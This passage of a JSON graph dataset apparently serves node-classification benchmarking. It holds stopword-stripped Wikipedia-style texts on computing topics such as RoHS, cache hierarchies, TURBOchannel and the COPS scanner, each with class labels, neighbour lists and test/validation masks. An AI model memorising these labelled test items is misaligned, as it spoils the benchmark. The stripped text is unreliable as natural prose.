million tons year worldwide according un environment programme american electronics sent offshore countries like ghana west africa guise recycling may harm good adult child workers jobs poisoned heavy metals metals returning u.s. u.s. right shipping large quantities leaded materials china china world major manufacturing center dr. jeffrey weidenhamer says chemistry professor ashland university ohio surprising things coming full circle 're getting contaminated products back addition high-tech waste problem rohs reflects contemporary research past 50 years biological toxicology acknowledges long-term effects low-level chemical exposure populations new testing capable detecting much smaller concentrations environmental toxicants researchers associating exposures neurological developmental reproductive changes rohs environmental laws contrast historical contemporary law seek address acute toxicology direct exposure large amounts toxic substances causing severe injury death united states environmental protection agency epa published life-cycle assessment lca environmental impacts lead-free tin–lead solder used electronic products bar solders lead-free solders considered tin/copper alternative lowest best scores paste solders bismuth/tin/silver lowest impact scores among lead-free alternatives every category except non-renewable resource consumption paste bar solders lead-free solder alternatives lower better lca score toxicity categories tin/lead solder primarily due toxicity lead amount lead leaches printed wiring board assemblies determined leachability study conducted partnership study results providing industry objective analysis life-cycle environmental effects leading candidate alternative lead-free solders allowing industry consider environmental concerns along traditionally evaluated parameters cost performance assessment also allowing industry redirect efforts toward products processes reduce solders environmental footprint including energy consumption releases toxic chemicals potential risks human health environment another life-cycle assessment ikp university stuttgart shows similar results epa study ban concentrations brominated flame retardants bfr 0.1 plastics affected plastics recycling products include recycled plastics become critical know bfr concentration plastics either tracing origins recycled plastics establish bfr concentrations measuring bfr concentrations samples plastics high bfr concentrations costly handle discard whereas plastics levels 0.1 value recyclable materials number analytical techniques rapid measurement bfr concentrations x-ray fluorescence spectroscopy confirm presence bromine br indicate bfr concentration specific molecule ion attachment mass spectrometry iams used measure bfr concentrations plastics bfr ban significantly affected upstream plastic material selection downstream plastic material recycling rohs 2 directive 2011/65/eu evolution original directive became law 21 july 2011 took effect 2 january 2013 addresses substances original directive improving regulatory conditions legal clarity requires periodic re-evaluations facilitate gradual broadening requirements cover additional electronic electrical equipment cables spare parts ce logo indicates compliance rohs 2 declaration conformity detailed see 2012 final report european commission revealed eu member states considered toys scope primary rohs 1 directive 2002/95/ec irrespective whether primary secondary functions using electric currents electromagnetic fields implementation rohs 2 rohs recast directive 2011/65/eu concerned member states comply new regulation key difference recast necessary demonstrate conformity similar way lvd emc directives able show compliance sufficiently detailed files ensuring implemented production criminal offence like ce marking directives mandates production control traceability technical files describes 2 methods achieving presumption conformity directive 2011/65/eu article 16.2 either technical files include test data materials standard accepted official journal directive used currently standard en50581 risk based method reduce amount test data required harmonised standards list rohs2 ojeu c363/6 one consequences requirement demonstrate conformity requirement know exemption use component otherwise possible know compliance product placed market point time product must 'compliant many understand 'compliance varies depending exemptions force quite possible make non-compliant product 'compliant components compliance must calculated day placing market reality means knowing exemption status components using stock old status parts expire date exemptions directive 2011/65/eu article 7.b referring decision 768/2008/ec module internal production control system manage could seen lack diligence criminal prosecution could occur uk instrument 2012 n. 3032 section 39 penalties rohs 2 also dynamic approach exemptions creating automatic expiration exemptions renewed requests industry additionally new substances added controlled list 4 new substances expected controlled 2019 mean greater information control update systems required differences include new responsibilities importers distributors markings improve traceability technical files part nlf directives make supply chain active part policing directive 2011/65/eu articles 7 9 10 recent additional amendment 2017/2102 2011/65 rohs 2 directive 2011/65/eu contains allowance add new materials 4 materials highlighted attention original version amendment 2015/863 adds four additional substances annex ii 2011/65/eu 3/4 new restrictions recommended investigation original directive ref para 10 preamble another reason simple component rohs compliance statements acceptable compliance requirements vary depending date product placed market ref en50581:2012 additional four substances restriction evidence requirements shall applied products placed market 22 july 2019 except exemptions permit stated annex iii. although time writing exemptions exist applied materials four additional substances maximum permitted concentrations non-exempt products 0.1 new substances also listed reach candidate list dehp authorised manufacturing use substance eu annexe xiv reach 80 exemptions quite broad exemptions automatically expire 5 7 years unless renewed according hewlett packard european union gradually narrowing scope expiring many current rohs exemptions addition likely new substance restrictions introduced next several years exemptions medical devices exempt original directive rohs 2 narrowed exemption scope active implantable medical devices category 4h vitro diagnostic devices ivdd medical devices included automotive vehicles exempt category 4f vehicles instead addressed end life vehicles directive directive 2000/53/ec products within scope rohs 2 directive must display ce mark manufacturers name address serial batch number parties needing know detailed compliance information find eu declaration conformity product created manufacturer brand owner responsible design eu representative regulation also requires actors supply chain product importer distributors keep check document well ensuring conformance process followed correct language translation instructions provided manufacturer must keep certain documentation demonstrate conformity known technical file technical records directive requires manufacturer demonstrate conformity use test data materials following harmonised standard en50581:2012 standard time writing regulators may request file likely specific data likely large rohs require specific product labelling many manufacturers adopted compliance marks reduce confusion visual indicators included explicit rohs compliant labels green leaves check marks pb-free markings chinese rohs labels lower case e within circle arrows also imply compliance rohs 2 attempts address issue requiring aforementioned ce mark whose use policed trading standards enforcement agency states permitted indication rohs compliance ce mark closely related weee waste electrical electronic equipment directive became law simultaneously rohs depicts waste-can logo x often accompanies ce mark new substance restrictions considered introduction next years include phthalates brominated flame retardants bfrs chlorinated flame retardants cfrs pvc california passed electronic waste recycling act 2003 ewra law prohibits sale electronic devices 1 january 2007 prohibited sold eu rohs directive across much narrower scope includes lcds crts like covers four heavy metals restricted rohs ewra also restricted material disclosure requirement effective 1 january 2010 california lighting efficiency toxics reduction act applies rohs general purpose lights i.e lamps bulbs tubes electric devices provide functional illumination indoor residential indoor commercial outdoor use us states cities debating whether adopt similar laws several states mercury pbde bans already worldwide standards certification available qc 080000 standard governed national standards authority ireland ensure control hazardous substances industrial applications 2012 sweden chemicals agency kemi electrical safety authority tested 63 consumer electronics products found 12 compliance kemi claims similar testing results prior years eleven products contained prohibited levels lead one polybrominated diphenyl ether flame retardants details seven companies passed swedish prosecutors kemi says levels non-compliance rohs similar previous years remain high rohs environmental standard electronic product developers aware manufacturers find cheaper single bill materials product distributed worldwide instead customising product fit country specific environmental laws therefore develop standards allow strictest allowable substances example ibm forces suppliers complete product content declaration form document compliance environmental standard 'baseline environmental requirements materials parts products ibm logo hardware products thus ibm banned decabde even though formerly rohs exemption material overturned european court 2008 similarly hewlett-packard environmental standard adverse effects product quality reliability plus high cost compliance especially small business cited criticisms directive well early research indicating life cycle benefits lead-free solder versus traditional solder materials mixed criticism earlier came industry resistant change misunderstanding solders soldering processes deliberate misinformation espoused resist perceived non-tariff barrier created european bureaucrats many believe industry stronger experience better understanding science technologies involved one criticism rohs restriction lead cadmium address prolific applications costly electronics industry comply specifically total lead used electronics makes 2 world lead consumption 90 lead used batteries covered battery directive mentioned requires recycling limits use mercury cadmium restrict lead another criticism less 4 lead landfills due electronic components circuit boards approximately 36 due leaded glass cathode ray tube monitors televisions contain 2 kg per screen common lead-free solder systems higher melting point e.g 30 °c typical difference tin-silver-copper alloys wave soldering temperatures approximately ~255 °c however temperature typical lead free solders longer wetting times eutectic pb/sn 37:63 solder additionally wetting force typically lower disadvantageous hole filling advantageous situations closely spaced components care must taken selection rohs solders formulations harder less ductility increasing likelihood cracks instead plastic deformation typical lead-containing solders cracks occur due thermal mechanical forces acting components circuit board former common manufacturing latter field rohs solders exhibit advantages disadvantages respects dependent packaging formulation editor conformity magazine wondered 2005 transition lead-free solder would affect long-term reliability electronic devices systems especially applications mission-critical consumer products citing possible breaches due environmental factors like oxidation 2005 farnell/newark inone rohs legislation technical manual cites lead-free solder issues potential reliability concerns addressed annex item 7 rohs directive granting specific exemptions regulation 2010 issues raised directive first implemented 2003 reliability effects less known another potential problem lead-free high tin-based solders may face growth tin whiskers thin strands tin grow make contact adjacent trace developing short circuit historically tin whiskers associated handful failures including nuclear power plant shutdown pacemaker incident pure tin plating used however failures pre-date rohs also involve consumer electronics therefore may employ rohs-restricted substances desired help mitigate potential problems lead-free manufacturers using variety approaches tin-zinc formulations produce non-conducting whiskers formulations reduce growth although halt growth completely circumstances fortunately experience thus far suggests deployed instances rohs compliant products failing due whisker growth dr. ronald lasky dartmouth college reports rohs force 15 months 400b rohs-compliant products produced products field significant numbers tin whisker-related failures reported whisker growth occurs slowly time unpredictable fully understood time may true test efforts whisker growth even observable lead-based solders albeit much smaller scale countries exempted medical telecommunication infrastructure products legislation however may moot point since electronic component manufacturers convert production lines producing lead-free parts conventional parts eutectic tin-lead solder simply available even military aerospace industrial users extent solder involved least partially mitigated many lead-free components compatibility lead-containing solder processes leadframe-based components quad flat packages qfp small outline integrated circuits soic small outline packages sop gull wing leads generally compatible since finish part leads contributes small amount material finished joint however components ball grid arrays bga come lead-free solder balls leadless parts often compatible lead-containing processes de minimis exemptions e.g. micro-businesses economic effect anticipated least attempts mitigating effect made another form economic effect cost product failures switch rohs compliance example tin whiskers responsible 5 failure rate certain components swiss swatch watches 2006 prior july implementation rohs reportedly triggering us 1 billion recall swatch responded applying exemption rohs compliance denied rohs helps reduce damage people environment third-world countries much today high-tech waste ends use lead-free solders components reduces risks electronics industry workers prototype manufacturing operations contact solder paste longer represents health hazard used contrary predictions widespread component failure reduced reliability rohs first anniversary july 2007 passed little fanfare contemporary consumer electronics rohs compliant 2013 millions compliant products use worldwide many electronics companies keep rohs status pages corporate websites example amd website states although lead containing solder completely eliminated applications today amd engineers developed effective technical solutions reduce lead content microprocessors chipsets ensure rohs compliance minimizing costs maintaining product features change fit functional electrical performance specifications quality reliability standards rohs compliant products expected identical compared current packages rohs printed circuit board finishing technologies surpassing traditional formulations fabrication thermal shock solder paste printability contact resistance aluminium wire bonding performance nearing performance attributes properties lead-free solder high temperature resilience used prevent failures harsh field conditions conditions include operating temperatures test cycles range −40 °c +150 °c severe vibration shock requirements automobile manufacturers turning rohs solutions electronics move engine bay one major differences lead-containing lead-free solder pastes flow solder liquid state lead-containing solder lower surface tension tends move slightly attach exposed metal surfaces touch part liquid solder lead-free solder conversely tends stay place liquid state attaches exposed metal surfaces liquid solder touches lack flow – typically seen disadvantage lead lower quality electrical connections – used place components tightly used placed due properties lead-containing solders example motorola reports new rohs wireless device assembly techniques ... enabling smaller thinner lighter unit motorola q phone would possible without new solder lead-free solder allows tighter pad spacing research new alloys technologies allowing companies release rohs products currently exempt compliance e.g computer servers ibm announced rohs solution high lead solder joints thought remain permanent exemption lead-free packaging technology ... offers economical advantages relation traditional bumping processes solder waste reduction use bulk alloys quicker time-to-market products much lower chemical usage rate test measurement vendors national instruments also started produce rohs-compliant products despite devices category exempt rohs directive",
    "neighbors": [
      6658,
      5384,
      11534,
      9499,
      3666,
      2867,
      7579,
      597,
      6197,
      3323,
      1500
    ],
    "mask": "Test"
  },
  {
    "node_id": 404,
    "label": 7,
    "text": "Nimrod_(distributed_computing):nimrod distributed computing nimrod tool parameterisation serial programs create execute embarrassingly parallel programs computational grid co-allocating scheduling brokering service nimrod one first tools make use heterogeneous resources grid single computation also early example using market economy perform grid scheduling enables nimrod provide guaranteed completion time despite using best-effort services tool created research project funded distributed systems technology centre principal investigator professor david abramson monash university commercial product based nimrod called enfuzion available axceleon",
    "neighbors": [
      9040,
      11353,
      5956
    ],
    "mask": "None"
  },
  {
    "node_id": 405,
    "label": 7,
    "text": "Zonbu:zonbu zonbu technology company markets computing platform combines web-centric service small form factor pc open source based software architecture zonbu founded alain rossmann previously founder ceo openwave gregoire gentil previously co-founder twingo systems first-generation zonbox hardware ebox-4854 sold dmp electronics taiwan called zonbu mini nettop computer measuring 6 ¾ ” × 4 ¾ ” × 2 ¼ ” flash based fanless thus effectively silent official specifications device 2007 1.2 ghz via eden cpu c7 esther core 512 mb ram ethernet twisted pair 10/100 mbit/s ps/2 keyboard mouse ports vga display port 6 usb 2.0 ports 4 gb compactflash local storage graphics 2048 x 1536 16 million colors – hardware graphics mpeg2 acceleration disassembly zonbu owners shown zonbu includes options internal expansion mini pci slot optional wireless card ide connector room case 2.5 hard drive serial parallel ports zonbu subscription plans include online storage using amazon s3 automatic upgrades online support remote file access subscription service promoted reducing hassle typical computer maintenance tasks hardware repair software installation updates upgrades malicious software removal zonbu os customized version linux based gentoo distribution using xfce desktop environment geared towards non-technical users user interface focuses simplicity advanced features filesystem architecture combines transparent overlay filesystem pioneered linux live distributions on-line backup service user data locally cached compact flash card transparently encrypted 128-bit encryption transferred remote storage servers amazon s3 zonbu comes pre-loaded number software applications include firefox web browser openoffice productivity suite skype ip phone service 30 casual games default os user allowed install third-party software default set applications supposed fit needs non-technical users second home pc however zonbu provides instructions unlock operating system install additional software procedure technical intended minority users standard many linux users unlocking grub root install emerge/portage",
    "neighbors": [
      1537,
      3585,
      2308,
      780,
      4236,
      10893,
      911,
      1935,
      4623,
      1682,
      8592,
      2965,
      2328,
      4377,
      8986,
      5019,
      10393,
      6178,
      6307,
      6565,
      9766,
      5159,
      3883,
      6444,
      10109,
      8495,
      816,
      3121,
      9266,
      823,
      7352,
      1849,
      3903,
      1728,
      2496,
      4289,
      11201,
      7492,
      10820,
      1224,
      8520,
      11337,
      4429,
      7248,
      1362,
      467,
      9682,
      6618,
      5339,
      2397,
      6367,
      2784,
      4194,
      11646,
      3300,
      5732,
      10090,
      3819,
      7660,
      2285,
      8044,
      9581,
      1776,
      10606,
      2420,
      2170,
      5499,
      253,
      1150,
      8446
    ],
    "mask": "Validation"
  },
  {
    "node_id": 406,
    "label": 2,
    "text": "ICL_Direct_Machine_Environment:icl direct machine environment direct machine environment abbreviated dme mainframe environment icl 2900 series computing systems international computers limited developed 1970s dme more-or-less icl 1900 order code processor microcode permitted icl 1900 series executive operating systems program libraries operate icl 2900 series time companies computers large teams programmers write applications dme developed customers could buy new hardware run 1900 system 4 applications whilst developed replacement vme applications led users running dme vme alternately machine years unfortunately led situations development teams waiting around time run new applications fact users moving new system led icl develop system called concurrent machine environment cme vme ran dme subsystem enabling 1900 system 4 applications run 2900 series 39 machine alongside vme applications",
    "neighbors": [
      512,
      5730,
      7173,
      3594,
      8524,
      2541,
      5455,
      7983,
      2804,
      4151,
      3960,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 407,
    "label": 3,
    "text": "Cache_hierarchy:cache hierarchy cache hierarchy multi-level caches refers memory architecture uses hierarchy memory stores based varying access speeds cache data highly-requested data cached high-speed access memory stores allowing swifter access central processing unit cpu cores cache hierarchy form part memory hierarchy considered form tiered storage design intended allow cpu cores process faster despite memory latency main memory access accessing main memory act bottleneck cpu core performance cpu waits data making main memory high-speed may prohibitively expensive high-speed caches compromise allowing high-speed access data most-used cpu permitting faster cpu clock history computer electronic chip development period increases cpu speed outpaced improvements memory access speed gap speed cpus memory meant cpu would often idle cpus increasingly capable running executing larger amounts instructions given time time needed access data main memory prevented programs fully benefiting capability issue motivated creation memory models higher access rates order realize potential faster processors resulted concept cache memory first proposed maurice wilkes british computer scientist university cambridge 1965 called memory models slave memory roughly 1970 1990 papers articles anant agarwal alan jay smith mark d. hill thomas r. puzak others discussed better cache memory designs first cache memory models implemented time even researchers investigating proposing better designs need faster memory models continued need resulted fact although early cache models improved data access latency respect cost technical limitations feasible computer system cache approach size main memory 1990 onward ideas adding another cache level second-level backup first-level cache proposed jean-loup baer wen-hann wang andrew w. wilson others conducted research model several simulations implementations demonstrated advantages two-level cache models concept multi-level caches caught new generally better model cache memories since 2000 multi-level cache models received widespread attention currently implemented many systems three-level caches present intel core i7 products accessing main memory instruction execution may result slow processing clock speed depending time required find fetch data order hide memory latency processor data caching used whenever data required processor fetched main memory stored smaller memory structure called cache need data cache searched first going main memory structure resides closer processor terms time taken search fetch data respect main memory advantages using cache proven calculating average access time aat memory hierarchy without cache caches small size may result frequent misses – search cache provide sought-after information – resulting call main memory fetch data hence aat affected miss rate structure searches data aat main memory given hit time aat caches given hit time caches less hit time main memory aat data retrieval significantly lower accessing data cache rather main memory using cache may improve memory latency may always result required improvement time taken fetch data due way caches organized traversed example direct-mapped caches size usually higher miss rate fully associative caches may also depend benchmark computer testing processor pattern instructions using fully associative cache may result power consumption search whole cache every time due trade-off power consumption associated heat size cache becomes critical cache design case cache miss purpose using structure rendered useless computer go main memory fetch required data however multiple-level cache computer misses cache closest processor level-one cache l1 search next-closest level cache go main memory methods fail general trend keep l1 cache small distance 1–2 cpu clock cycles processor lower levels caches increasing size store data l1 hence distant lower miss rate results better aat number cache levels designed architects according requirements checking trade-offs cost aats size technology-scaling allowed memory systems able accommodated single chip modern day processors three four cache levels reduction aat understood example computer checks aat different configurations l3 caches example main memory 50 l1 1 ns 10 miss rate l2 5 ns with1 miss rate l3 10 ns 0.2 miss rate banked cache cache divided cache dedicated instruction storage cache dedicated data contrast unified cache contains instructions data cache process l1 cache upper-level cache relation connection processor accessed processor retrieve instructions data requiring actions implemented time requires multiple ports access time unified cache multiple ports requires additional hardware wiring leading significant structure caches processing units avoid l1 cache often organized banked cache results fewer ports less hardware generally lower access times modern processors split caches systems multilevel caches higher level caches may unified lower levels split whether block present upper cache layer also present lower cache level governed memory system inclusion policy may inclusive exclusive non-inclusive non-exclusive nine inclusive policy blocks present upper-level cache present lower-level cache well upper-level cache component subset lower-level cache component case since duplication blocks wastage memory however checking faster exclusive policy cache hierarchy components completely exclusive element upper-level cache present lower cache components enables complete usage cache memory however high memory-access latency policies require set rules followed order implement none forced resulting inclusion policy called non-inclusive non-exclusive nine means upper-level cache may may present lower-level cache two policies define way modified cache block updated main memory write write back case write policy whenever value cache block changes modified lower-level memory hierarchy well policy ensures data stored safely written throughout hierarchy however case write back policy changed cache block updated lower-level hierarchy cache block evicted dirty bit attached cache block set whenever cache block modified eviction blocks set dirty bit written lower-level hierarchy policy risk data-loss recently changed copy datum stored cache therefore corrective techniques must observed case write byte present cache block byte may brought cache determined write allocate write no-allocate policy write allocate policy states case write miss block fetched main memory placed cache writing write no-allocate policy block missed cache write lower-level memory hierarchy without fetching block cache common combinations policies write block write allocate write write no-allocate private cache assigned one particular core processor accessed cores architectures core private cache creates risk duplicate blocks system cache architecture results reduced capacity utilization however type design choice multi-layer cache architecture also lend lower data-access latency shared cache cache accessed multiple cores since shared block cache unique therefore larger hit rate duplicate blocks however data-access latency increase multiple cores try access cache multi-core processors design choice make cache shared private impacts performance processor practice upper-level cache l1 sometimes l2 implemented private lower-level caches implemented shared design provides high access rates high-level caches low miss rates lower-level caches",
    "neighbors": [
      7173,
      9739,
      5649,
      2066,
      7699,
      5655,
      10781,
      8231,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      4217,
      3725,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      7858,
      4276,
      9911,
      8890,
      4286,
      2241,
      2243,
      5329,
      10966,
      731,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      7421,
      1798,
      1801,
      6926,
      6415,
      1298,
      2339,
      6950,
      309,
      8501,
      5948,
      4928,
      8514,
      6476,
      7505,
      9044,
      11604,
      8543,
      1376,
      10603,
      876,
      4465,
      1399,
      7033,
      1402,
      1915,
      3457,
      398,
      3470,
      5523,
      9126,
      9132,
      10669,
      1967,
      2480,
      4017,
      8624,
      10675,
      1461,
      1463,
      7607,
      4030,
      3014,
      466,
      1499,
      1502,
      5090,
      995,
      6633,
      9707,
      10734,
      6639,
      499,
      4596,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 408,
    "label": 3,
    "text": "TURBOchannel:turbochannel turbochannel open computer bus developed dec late 1980s early 1990s although open vendor implement systems mostly used digital systems mips-based decstation decsystem systems vaxstation 4000 alpha-based dec 3000 axp digital abandoned use turbochannel favor eisa pci buses late 1994 introduction alphastation alphaserver systems turbochannel developed late 1980s digital continuously revised early 1990s turbochannel industry group industry group set digital develop promote bus turbochannel open bus beginning specification publicly available initial purchase cost reproduction material third-party implementation mechanical specifications implementation systems options turbochannel selected failed ace advanced computing environment use industry standard bus arc advanced risc computing compliant machines digital initially expected turbochannel gain widespeard industry acceptance due status arc standard although ultimately digital major user turbochannel dec 3000 axp decstation 5000 series decsystem vaxstation 4000 systems third parties implemented turbochannel systems implement numerous turbochannel option modules digital systems although main developer promoter turbochannel turbochannel industry group digital tri/add program initiative provide technical marketing support third parties implementing peripherals based open interfaces futurebus+ scsi vme turbochannel digital systems also involved promoting turbochannel implementation sales tri/add program discontinued 15 december 1992 except japan early 1990s digital expected turbochannel bus face serious competition buses vendors hp sun ibm therefore announced intended update existing turbochannel specification permit transfer 200 mb/s using similar hardware upgrade protocol backwards compatible digital later canceled intended update turbochannel towards end 1994 became clear pci become dominant turbochannel 32-bit address data multiplexed bus clocked frequencies 12.5 25 mhz maximum theoretical usable bandwidth 90 mb/s bus however differs others time point point control lines firmware contained within turbochannel cards mips machine code remnant bus original use mips-based systems later systems used bus alpha-based dec 3000 axp used emulator contained system firmware properly initialize turbochannel synchronous asymmetrical i/o channel asymmetrical sense option modules digital terminology expansion card communicate system module digital terminology motherboard option modules simple protocol used make turbochannel efficient turbochannel bus permit bus mastering turbochannel connected device wishes communicate another must first transfer information memory device read turbochannel protocol specifies option physical address space address space used address registers memory option maximum amount specified 16 gb although implementation amount anywhere amount digital systems used anywhere 4 mb early decstation 5000s 128 mb high-end dec 3000 axp models turbochannel bus uses 32-bit data address multiplexed bus transferring data addresses every turbochannel option slot set seven point-to-point control lines five lines universal control arbitration point-to-point control lines connected directly turbochannel interface turbochannel interface defined turbochannel specification although digital introduced three possible schemes example asic three possible schemes divided low-cost mid-range high performance system implementations system either time-multiplex multiple option slots order use single memory port share bandwidth dedicate memory port option slot turbochannel option modules uses 96-pin din connector specifically din 41612 option modules mounted inline system module option module single- double- triple-width although double triple width options used one turbochannel connector mean bandwidth doubled tripled slots still sharing single bus double- triple-width option modules used mechanically accommodate larger option modules supplying power mechanical specification option modules also flexible limitations attaching daughterboards simm modules used graphics options components could mounted sides option module components bottom restricted height ensure option module could fit system module maintaining enough airflow cooling airflow 150 lfms required option module airflow 50 lfms required option module slot 44 signal pins 32 used data addressing turbochannel slot supplies +5 +12v power rails provides maximum 26 watts power following table shows many amperes supplied power rail turbochannel bus extended turbochannel extender tce box options 3d graphics accelerators may require power board space single slot provide often double- triple-width option modules option modules consume additional space slots inside system presence may limit number even prevent installation turbochannel option modules turbochannel extender box used reduce number slots required inside system double triple width options turbochannel extender box contains pcb three turbochannel slots power supply supplying required power slots turbochannel option module installation host accompanies tce box external cable connects tce box option module bringing data addressing control lines turbochannel extender box performance loss associated use tce box although tce boxes support one option module regardless many remaining slots",
    "neighbors": [
      9742,
      2452,
      6942,
      799,
      2723,
      6187,
      7215,
      8625,
      2994,
      7234,
      3142,
      6854,
      10833,
      9686,
      11627,
      8301,
      5873,
      3445,
      5368,
      9723,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 409,
    "label": 3,
    "text": "Load–store_architecture:load–store architecture computer engineering load–store architecture instruction set architecture divides instructions two categories memory access load store memory registers alu operations occur registers risc instruction set architectures powerpc sparc risc-v arm mips load–store architectures instance load–store approach operands destination add operation must registers differs register–memory architecture example cisc instruction set architecture x86 one operands add operation may memory register earliest example load–store architecture cdc 6600 almost vector processors including many gpus use load–store approach",
    "neighbors": [
      7173,
      9739,
      7699,
      5655,
      10781,
      8231,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      5872,
      8944,
      757,
      2805,
      10485,
      249,
      1798,
      5897,
      6926,
      6415,
      1298,
      6950,
      309,
      8501,
      5948,
      4928,
      8514,
      6476,
      7505,
      9044,
      11604,
      8543,
      1376,
      10603,
      4465,
      1399,
      7033,
      1402,
      3451,
      3457,
      398,
      3470,
      5523,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      5090,
      995,
      9707,
      10734,
      6639,
      499,
      4596,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 410,
    "label": 2,
    "text": "BlackBerry_Mobile:blackberry mobile blackberry mobile trading name used tcl communication sell blackberry branded devices world markets excluding indonesia india bangladesh sri lanka nepal blackberry limited creator blackberry brand decided 2016 cease competing smartphone market directly focus making security software due tcl communication charge manufacturing distributing designing blackberry-branded devices global market blackberry keyone first device made blackberry mobile brand although partially designed blackberry limited devices made blackberry mobile continue shipped running android along security software provided blackberry limited suite software includes dtek blackberry messenger blackberry hub also software secure boot start-up ensure android system tampered many features comparable blackberry 10 blackberry ltd former flagship operating system early 2000s research motion limited known rim became dominant mobile industry blackberry brand global dominance smartphone industry 2007 rim highest growth blackberry brand afterward slowly lost dominance many consumers moving towards devices like iphone apple samsung galaxy due all-touchscreen form factor later physical qwerty keyboard smartphone became significant feature blackberry brand named rim renamed blackberry limited set new strategy one focusing improving brand blackberry priv launched 2015 first device running android device came full touchscreen qwerty keyboard underneath 2016 blackberry ltd outsourced production tcl manufacture blackberry dtek50 dtek60 later 2016 blackberry announced moving away in-house manufacturing production moving become software security company december 2016 tcl chosen global licensee blackberry brand ces 2017 tcl showed rumored blackberry 'mercury although stating specifications device ahead mobile world congress barcelona spain tcl officially announced device stating official name blackberry keyone device designed blackberry ltd. rather tcl device sold blackberry mobile brand",
    "neighbors": [
      9732,
      6539,
      9101,
      8719,
      11282,
      7835,
      4124,
      2208,
      424,
      3511,
      10303,
      9408,
      6981,
      2892,
      3152,
      2259,
      8917,
      8921,
      2788,
      3949,
      9851,
      9341,
      6271
    ],
    "mask": "Validation"
  },
  {
    "node_id": 411,
    "label": 2,
    "text": "Consistent_Network_Device_Naming:consistent network device naming consistent network device naming convention naming ethernet adapters linux created around 2009 replace old naming scheme caused problems multihomed machines network interface controllers nics would named based order found kernel booted removing existing adding new interfaces could cause previously added ones change names ecr submitted pci sig firmware group system firmware provide device naming operating systems via acpi interface new naming scheme convention implemented dell module called among first major linux distributions adopt module fedora 15 may 2011 red hat enterprise linux version 6.1 also released suse linux enterprise server 11 service pack 2 february 2012 newer dell poweredge dell precision models support new names open-source implementation available based udev mechanism present systemd red hat enterprise linux 7 introduces new network naming scheme part systemd",
    "neighbors": [
      1400,
      11135,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 412,
    "label": 5,
    "text": "Mercury_Mail_Transport_System:mercury mail transport system mercury mail transport system mercury mts standards-compliant mail server developed david harris also develops pegasus mail client freeware prior january 2007 donationware non-commercial personal use shareware uses two versions mercury similar functionality original version longer development set netware loadable modules nlms runs versions novell netware network operating system nos 3.x 6.x current worked conjunction ms-dos workstations running pegasus mail mercury/32 win32 application running versions microsoft windows windows 98 windows nt4 latest windows vista windows server 2008 windows xp windows server 2003 recommended either version act mail server lan additional support netware lan features mercury fully independent mail server provide email services standards-compliant email clients eudora microsoft outlook versions mercury highly modular allowing support different sets internet protocols installed required mercury also installed tightly integrated pegasus mail combination pegasus/mercury similar mail aspects microsoft outlook/microsoft exchange server mercury originally developed handle mail internal external netware servers either bindery nds mode mercury ran system server integrated pegasus mail running ms-dos windows workstations mercury extremely standards-compliant supporting major internet mail-related protocols including smtp sending receiving mail pop3 imap win32 version also supports dialup connection versions many features especially powerful support managed mailing lists mercury intended largely unobtrusive needs little ongoing maintenance installation process simple task taking less minute point user must indicate domain parameter used user list manually administered limit numbers users declared single directory holds users storage locations backup copy mail directory copy users data also standard anti-virus could used mail received two files created files finally written disk simple antivirus engine could scan clamav antivirus engine supplied used desired software enormous variety configurations using proper care server could secure relay control effective ability filter mails based many rules making efficient could use blacklist/whitelist technology included tools reduce spam effects mercury/32 open source software extended anyone development documentation free publicly available pmail community well known extensions bundled mercury/32 development version netware basically stopped release version 1.48 26 may 2000 replacement windows version recommended security patch bringing mercury nlm version 1.49 released august 2007 19 june 2009 david harris announced pegasus mail site development pegasus mail associated mercury program could continue sufficient users would commit donating us 50 annually 21 july 2009 said good start new versions programs released since developer david harris said april 2017 pegasus mail mercury transport system active major development july 2019 announced mercury v5 near going beta xampp initiative apache friends develop cross-platform web server solution pack main core components apache http server mariadb mysql database php perl interpreters intended cross platform equivalent lamp stack used linux mail systems natively distributed linux operating system case microsoft windows platform apache friends selected mercury mts component specific documents provided apache friends installation configuration xampp components concept providing information via faqs forums however third party descriptions configuration use mercury mts component available",
    "neighbors": [
      8582,
      10248,
      6797,
      10906,
      8747,
      7983,
      3250,
      9909,
      7739,
      2748,
      3007,
      8644,
      5063,
      76,
      471,
      4439,
      865,
      4074,
      8683,
      11500,
      3182,
      5230,
      7022
    ],
    "mask": "Test"
  },
  {
    "node_id": 413,
    "label": 4,
    "text": "COPS_(software):cops software computer oracle password system cops first vulnerability scanner unix operating systems achieve widespread use created dan farmer student purdue university gene spafford helped farmer start project 1989 cops software suite comprising least 12 small vulnerability scanners programmed audit one part operating system cops farmer developed another vulnerability scanner called satan security administrator tool analyzing networks cops generally considered obsolete uncommon find systems set insecure manner cops identify",
    "neighbors": [
      3937,
      3172,
      2084,
      7337,
      4298,
      7983,
      8399,
      10387,
      3796,
      5492,
      8791,
      7325
    ],
    "mask": "Test"
  },
  {
    "node_id": 414,
    "label": 6,
